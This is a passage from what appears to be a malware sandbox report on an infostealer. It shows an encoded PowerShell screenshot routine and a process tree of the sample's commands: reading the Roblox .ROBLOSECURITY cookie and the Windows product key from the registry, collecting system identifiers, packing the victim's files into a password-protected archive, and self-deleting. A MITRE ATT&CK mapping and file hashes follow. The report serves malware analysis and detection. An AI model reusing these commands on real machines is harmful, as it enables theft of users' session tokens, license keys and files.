ACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      PID:2580
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fzrplpr0\fzrplpr0.cmdline"
        5⤵
        
        PID:1428
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE119.tmp" "c:\Users\Admin\AppData\Local\Temp\fzrplpr0\CSC1CE1D9DF1E58431FA129996EF49499A7.TMP"
        6⤵
        
        PID:4396
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:560
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Views/modifies file attributes
      PID:3508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4944
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4264
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:2516
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Views/modifies file attributes
      PID:4140
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4848
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4528
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4236
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4184
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4896
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4012
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2988
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:1552
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:3036
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:4896
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:4224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:2960
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      PID:4488
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI5002\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\tmJc0.zip" *"
    3⤵
    PID:3120
  - - C:\Users\Admin\AppData\Local\Temp\_MEI5002\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI5002\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\tmJc0.zip" *
      4⤵
      PID:1936
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:4072
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:3348
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:4544
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:4404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:1272
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:4184
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:3860
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:2460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:1816
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:2608
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:4100
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      PID:1796
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\N0K-v3.exe""
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:2196
  - - C:\Windows\system32\PING.EXE
      ping localhost -n 3
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:4724

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

Process Discovery

T1057

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
31054884895c0290095e4ebc73579349

SHA1
0d8204a352d7939fd683d7cbb04392941d8a9907

SHA256
2b3f6d244340c6708fe2411da7fcffdff9c67984e36ad72a295fab5a9d1df537

SHA512
0123b5d2fdfafc808e602766fbc8e598d83bddf7984dab3227a26ecccbd98d6f724957f7ec3ba939e876c78ca12d21cf220f2f8872195e9a387c2c1447b1f19d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
63b3bb06adb5f754997862437687ee51

SHA1
7f66ee0a776e69899b2fdae0d3074fb3c92e476c

SHA256
fe3dc6bb80986f36c9814c25b4e3a52fcaa46b389b6b77a2e71749cf34221c7d

SHA512
759c267a695ca738c87ffa42fae8c30a3da759c1560115246ef93c4e436e5a51e3879d516c7c9d5f10f1cd0d3e12e53420f2c825d43bf0d5ba8343a87508a24c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
6f311933b72a7cb16aed597be7fd19ef

SHA1
93fe57ce38503edcdc0b7bcaf4f027bc1b38fe91

SHA256
c03433577cad06633d4a8f809072bb4462a147ef1882725c2186e7cbdb840a45

SHA512
50448bc6fc0b68f73a101268e0d94811eda0884094ac81cb229e08ff8c2f82f473d04d43d81fa059b269ecc8edca405e78568782643272ea96756cdbaeb43ad2

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESE119.tmp

Filesize
1KB

MD5
3cae48883077373dab9320645bffd79b

SHA1
e6a1478caf9bfae6f79da1c7683183ec4185a6b6

SHA256
0b2b7377e7c0eb1ac91a25091b54915db72da8303eb5dce219410b47643aaec2

SHA512
0e1d687b8b6e837d6c146ab6e6ecb1cd3a95afc152dfd80d8c22f91699e6d7aa9324396a7f1ecda1d4155a5e749fcf85a68e038ae87d671d856f941aa88ee244

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI5002\VCRUNTIME140.dll

Filesize
106KB

MD5
49c96cecda5c6c660a107d378fdfc3d4

SHA1
00149b7a66723e3f0310f139489fe172f818ca8e

SHA256
69320f278d90efaaeb67e2a1b55e5b0543883125834c812c8d9c39676e0494fc

SHA512
e09e072f3095379b0c921d41d6e64f4f1cd78400594a2317cfb5e5dca03dedb5a8239ed89905c9e967d1acb376b0585a35addf6648422c7ddb472ce38b1ba60d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI5002\_bz2.pyd

Filesize
48KB

MD5
c413931b63def8c71374d7826fbf3ab4

SHA1
8b93087be080734db3399dc415cc5c875de857e2

SHA256
17bfa656cabf7ef75741003497a1c315b10237805ff171d44625a04c16532293

SHA512
7dc45e7e5ed35cc182de11a1b08c066918920a6879ff8e37b6bfbdd7d40bffa39ea4aca778aa8afb99c81a365c51187db046bceb938ce9ace0596f1cf746474f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI5002\_ctypes.pyd

Filesize
58KB

MD5
00f75daaa7f8a897f2a330e00fad78ac

SHA1
44aec43e5f8f1282989b14c4e3bd238c45d6e334

SHA256
9ffadcb2c40ae6b67ab611acc09e050bbe544672cf05e8402a7aa3936326de1f

SHA512
f222f0ebf16a5c6d16aa2fba933034e692e26e81fea4d8b008259aff4102fe8acf3807f3b016c24002daa15bb8778d7fef20f4ae1206d5a6e226f7336d4da5d4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI5002\_decimal.pyd

Filesize
106KB

MD5
e3fb8bf23d857b1eb860923ccc47baa5

SHA1
46e9d5f746c047e1b2fefaaf8d3ec0f2c56c42f0

SHA256
7da13df1f416d3ffd32843c895948e460af4dc02cf05c521909555061ed108e3

SHA512
7b0a1fc00c14575b8f415fadc2078bebd157830887dc5b0c4414c8edfaf9fc4a65f58e5cceced11252ade4e627bf17979db397f4f0def9a908efb2eb68cd645c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI5002\_hashlib.pyd

Filesize
35KB

MD5
b227bf5d9fec25e2b36d416ccd943ca3

SHA1
4fae06f24a1b61e6594747ec934cbf06e7ec3773

SHA256
d42c3550e58b9aa34d58f709dc65dc4ee6eea83b651740822e10b0aa051df1d7

SHA512
c6d7c5a966c229c4c7042ef60015e3333dab86f83c230c97b8b1042231fdb2a581285a5a08c33ad0864c6bd82f5a3298964ab317736af8a43e7caa7669298c3e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI5002\_lzma.pyd

Filesize
85KB

MD5
542eab18252d569c8abef7c58d303547

SHA1
05eff580466553f4687ae43acba8db3757c08151

SHA256
d2a7111feeaacac8b3a71727482565c46141cc7a5a3d837d8349166bea5054c9

SHA512
b7897b82f1aa9d5aa895c3de810dab1aa335fdf7223e4ff29b32340ad350d9be6b145f95a71c7bc7c88c8df77c3f04853ae4d6f0d5a289721fc1468ecba3f958

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI5002\_queue.pyd

Filesize
25KB

MD5
347d6a8c2d48003301032546c140c145

SHA1
1a3eb60ad4f3da882a3fd1e4248662f21bd34193

SHA256
e71803913b57c49f4ce3416ec15dc8a9e5c14f8675209624e76cd71b0319b192

SHA512
b1fdb46b80bb4a39513685781d563a7d55377e43e071901930a13c3e852d0042a5302cd238ddf6ea4d35ceee5a613c96996bffad2da3862673a0d27e60ff2c06

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI5002\_socket.pyd

Filesize
43KB

MD5
1a34253aa7c77f9534561dc66ac5cf49

SHA1
fcd5e952f8038a16da6c3092183188d997e32fb9

SHA256
dc03d32f681634e682b02e9a60fdfce420db9f26754aefb9a58654a064dc0f9f

SHA512
ff9eeb4ede4b4dd75c67fab30d0dec462b8af9ca6adc1dcae58f0d169c55a98d85bb610b157f17077b8854ec15af4dfab2f0d47fa9bc463e5b2449979a50293a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI5002\_sqlite3.pyd

Filesize
56KB

MD5
1a8fdc36f7138edcc84ee506c5ec9b92

SHA1
e5e2da357fe50a0927300e05c26a75267429db28

SHA256
8e4b9da9c95915e864c89856e2d7671cd888028578a623e761aeac2feca04882

SHA512
462a8f995afc4cf0e041515f0f68600dfd0b0b1402be7945d60e2157ffd4e476cf2ae9cdc8df9595f0fe876994182e3e43773785f79b20c6df08c8a8c47fffa0

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI5002\_ssl.pyd

Filesize
65KB

MD5
f9cc7385b4617df1ddf030f594f37323

SHA1
ebceec12e43bee669f586919a928a1fd93e23a97

SHA256
b093aa2e84a30790abeee82cf32a7c2209978d862451f1e0b0786c4d22833cb6

SHA512
3f362c8a7542212d455f1f187e24f63c6190e564ade0f24561e7e20375a1f15eb36bd8dce9fdaafdab1d6b348a1c6f7cddb9016e4f3535b49136550bc23454fb

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI5002\base_library.zip

Filesize
1.4MB

MD5
32ede00817b1d74ce945dcd1e8505ad0

SHA1
51b5390db339feeed89bffca925896aff49c63fb

SHA256
4a73d461851b484d213684f0aadf59d537cba6fe7e75497e609d54c9f2ba5d4a

SHA512
a0e070b2ee1347e85f37e9fd589bc8484f206fa9c8f4020de147b815d2041293551e3a14a09a6eb4050cfa1f74843525377e1a99bbdcfb867b61ebddb89f21f7

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI5002\blank.aes

Filesize
125KB

MD5
dda3a524a0630884bdb438b9d7991670

SHA1
cb9ccf56af9c1a6731d18a7d411c8049551b79b4

SHA256
aa451413585cf104f69e7e608b2b64a0ce422a7a421180467f2fb7d9749f047d

SHA512
9a462a3b3b0285ca37ee8fcbc872b834ef1bdd3a5476515fe274b0d7176cfd7e8b14250c24f8231ae0231904f8ad47ea9e11727a3ae765df34bf5491fcebc0f4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI5002\libcrypto-3.dll

Filesize
1.6MB

MD5
78ebd9cb6709d939e4e0f2a6bbb80da9

SHA1
ea5d7307e781bc1fa0a2d098472e6ea639d87b73

SHA256
6a8c458e3d96f8dd3bf6d3cacc035e38edf7f127eee5563b51f8c8790ced0b3e

SHA512
b752769b3de4b78905b0326b5270091642ac89ff204e9e4d78670791a1fa211a54d777aeef59776c21f854c263add163adaef6a81b166190518cfaaf4e2e4122

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI5002\libffi-8.dll

Filesize
29KB

MD5
08b000c3d990bc018fcb91a1e175e06e

SHA1
bd0ce09bb3414d11c91316113c2becfff0862d0d

SHA256
135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece

SHA512
8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI5002\libssl-3.dll

Filesize
223KB

MD5
bf4a722ae2eae985bacc9d2117d90a6f

SHA1
3e29de32176d695d49c6b227ffd19b54abb521ef

SHA256
827fdb184fdcde9223d09274be780fe4fe8518c15c8fc217748ad5fd5ea0f147

SHA512
dd83b95967582152c7b5581121e6b69a07073e7a76fe87975742bb0fd7ecef7494ec940dba914364034cc4e3f623be98cc887677b65c208f14a2a9fc7497ca73

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI5002\python311.dll

Filesize
1.6MB

MD5
5f6fd64ec2d7d73ae49c34dd12cedb23

SHA1
c6e0385a868f3153a6e8879527749db52dce4125

SHA256
ff9f102264d1944fbfae2ba70e7a71435f51a3e8c677fd970b621c4c9ea71967

SHA512
c4be2d042c6e4d22e46eacfd550f61b8f55814bfe41d216a4df48382247df70bc63151068513855aa78f9b3d2f10ba6a824312948324c92de6dd0f6af414e8ab

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI5002\rar.exe

Filesize
615KB

MD5
9c223575ae5b9544bc3d69ac6364f75e

SHA1
8a1cb5ee02c742e937febc57609ac312247ba386

SHA256
90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

SHA512
57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI5002\rarreg.key

Filesize
456B

MD5
4531984cad7dacf24c086830068c4abe

SHA1
fa7c8c46677af01a83cf652ef30ba39b2aae14c3

SHA256
58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

SHA512
00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI5002\select.pyd

Filesize
25KB

MD5
45d5a749e3cd3c2de26a855b582373f6

SHA1
90bb8ac4495f239c07ec2090b935628a320b31fc

SHA256
2d15c2f311528440aa29934920fb0b015eaf8cbe3b3c9ad08a282a2d6ba68876

SHA512
c7a641d475a26712652a84b8423155ca347e0ec0155bd257c200225a64752453e4763b8885d8fb043b30e92ae023a501fff04777ba5cfe54da9a68071f25fbea

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI5002\sqlite3.dll

Filesize
622KB

MD5
dbc64142944210671cca9d449dab62e6

SHA1
a2a2098b04b1205ba221244be43b88d90688334c

SHA256
6e6b6f7df961c119692f6c1810fbfb7d40219ea4e5b2a98c413424cf02dce16c

SHA512
3bff546482b87190bb2a499204ab691532aa6f4b4463ab5c462574fc3583f9fc023c1147d84d76663e47292c2ffc1ed1cb11bdb03190e13b6aa432a1cef85c4b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI5002\unicodedata.pyd

Filesize
295KB

MD5
8c42fcc013a1820f82667188e77be22d

SHA1
fba7e4e0f86619aaf2868cedd72149e56a5a87d4

SHA256
0e00b0e896457ecdc6ef85a8989888ccfbf05ebd8d8a1c493946a2f224b880c2

SHA512
3a028443747d04d05fdd3982bb18c52d1afee2915a90275264bf5db201bd4612090914c7568f870f0af7dfee850c554b3fec9d387334d53d03da6426601942b4

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_va30nqpg.lor.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\fzrplpr0\fzrplpr0.dll

Filesize
4KB

MD5
61c9489b0362d5d7f75c7d6e91ad3aba

SHA1
95d3fffea94e2ab728af1c06f377a32825c1bc7b

SHA256
e63506834095f311886522ef321ebf2daac19cd8719988bda3b62abf553a00c3

SHA512
127a534d8c7a719dfd808d3487ca4ac888c6216e3acb2fea64763f14089057de38c1f781de04b4425011252ee71e68e2aa70b50e6f5a5baedba8d78e17c80cc4

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‍ \Common Files\Desktop\AddBlock.xlsx

Filesize
10KB

MD5
eb77cf667d68682e84e6ae6a08bf02a9

SHA1
4c30d3bec4f4b6de56146c528cc23d20292e87f4

SHA256
e432b7153c00050a87a865ba8ee6b4180ea076da7fa45ce006065f120cd78d23

SHA512
7810566c50091a06d7eae50a86a211bad33782e31d8986e876af9ccc884cab2ef44467a2ba322b92b04204d4a363d67f26977c1caf4a2b36be1a428889ae82f8

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‍ \Common Files\Desktop\SaveBackup.docx

Filesize
19KB

MD5
37b92842bbab5661efdbf910ec142543

SHA1
44f1f0c435b0b2b9f5932cf4ebdf33add426afce

SHA256
054f67352d089aaf8b7dd21e260e7c3e48562b9ddf0983c62961240bdb39ea75

SHA512
5232da5c1130dd22552f8208ba32bc2d31cba4d92415cc7593f3b66a072aca81452a51280eb9250a7976bb5001515cd23cdb01dd96d48065958426123a7c3c2a

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‍ \Common Files\Desktop\SubmitPublish.xlsx

Filesize
9KB

MD5
bdc36ae094708428c1d7b0157526d4b4

SHA1
0e9fc3ebd5133a00843d537229515c6a567b64e6

SHA256
1f13a443596e76f7d1cd3f9be044d2b3ca8f1c2d8e1f61fe7829cfe07dd6166a

SHA512
ece0d1747329372dee66bc55a2df8cfaaa71db49243365cfe472047956bfe93e72ffd4ec4ba4081befd086d674a0d486363223e25457e4bcd30e1a3f7081ef07

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‍ \Common Files\Desktop\SuspendUnblock.mp4

Filesize
236KB

MD5
9a4ffe9ac735e729a1f692fd68b9f200

SHA1
a3626403f8a7caaa7def1353de228a218ae8eaf1

SHA256
f4f35bad048caab2ba41ba5260f6bfe9ec8008f7efa90138f050eef46be461f6

SHA512
ce282516facdc9acdc00cfd5e18a5567c96d1859251e7886364637f67a77c358e54839fc2b1626477997c4017c9d5bc6df5b59811aeca550b82066ea0d9eef3b

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‍ \Common Files\Desktop\WatchPing.xlsx

Filesize
9KB

MD5
effa041a12d087ced94f3825d946cad1

SHA1
a4707b44117e563517cab14b697caa6ee42b3128

SHA256
dfb7b256bb1a3f813a60912b5a58fde56861f8802e968fd5849e4b931dff131a

SHA512
ac662d4323e83c174c3c6a5bd14f992345e2c59ab9c9ed742552001e78ba4dd8c58bfb4f193194e557927913995671963dcc3437a14378a5069f51259cbaa9f8

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‍ \Common Files\Documents\AssertUnprotect.docx

Filesize
12KB

MD5
827a05dec83f8e16e7bf12ee339b014e

SHA1
035bbac496e70d40f11a566c26125ff45b8f29ac

SHA256
018843fddf4b09c65f5b8570812bb59d659c2ef00b53ec2c430c19671fb0952a

SHA512
853787d48da6af5d9ec981fa5aea98c8fbd0c650e2710cc3e2dd2b82c365ebb6ec083cd5b05dc6444603cbbe3f02827fc8b9228965cf7a673d039cbe3a6c0945

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‍ \Common Files\Documents\EnableConvertTo.txt

Filesize
1015KB

MD5
67a58ceae3d1200796bca088e3e111aa

SHA1
893876e1d073a7c07da4ae8656b290d56079206c

SHA256
fb66d6b63b82a0635a6a859ffa08ec2ba205725ed40ac9dd41f7d721c9e1ad1f

SHA512
c4444195fd8afe7eab12622b1bc2b7b96c7d4cdc1615f2293103b601cabca36f8a752480a659a8d879f07a5f3395878fd4ab0cc6d078c6eaa4348d50647439b3

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‍ \Common Files\Documents\LimitWait.xlsx

Filesize
10KB

MD5
29d64f20e2a791a442ebfef442e30097

SHA1
0d7777f356b95290adb71944945bc7ab2834dea6

SHA256
5c392eb88796b5b8b24dd93a58951b2def21e797496d2c290b8574a3b8b75089

SHA512
0ca5efe16e0fbd6da9b7fd79ca5c7ca06fc4707b804680d49daf8a83cfaeb2990fdd335b0b7e2f666b70b4bdcf10b1d3f0af6826dd7f8cf6c101a1abef899dfd

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‍ \Common Files\Documents\ResetBackup.xla

Filesize
869KB

MD5
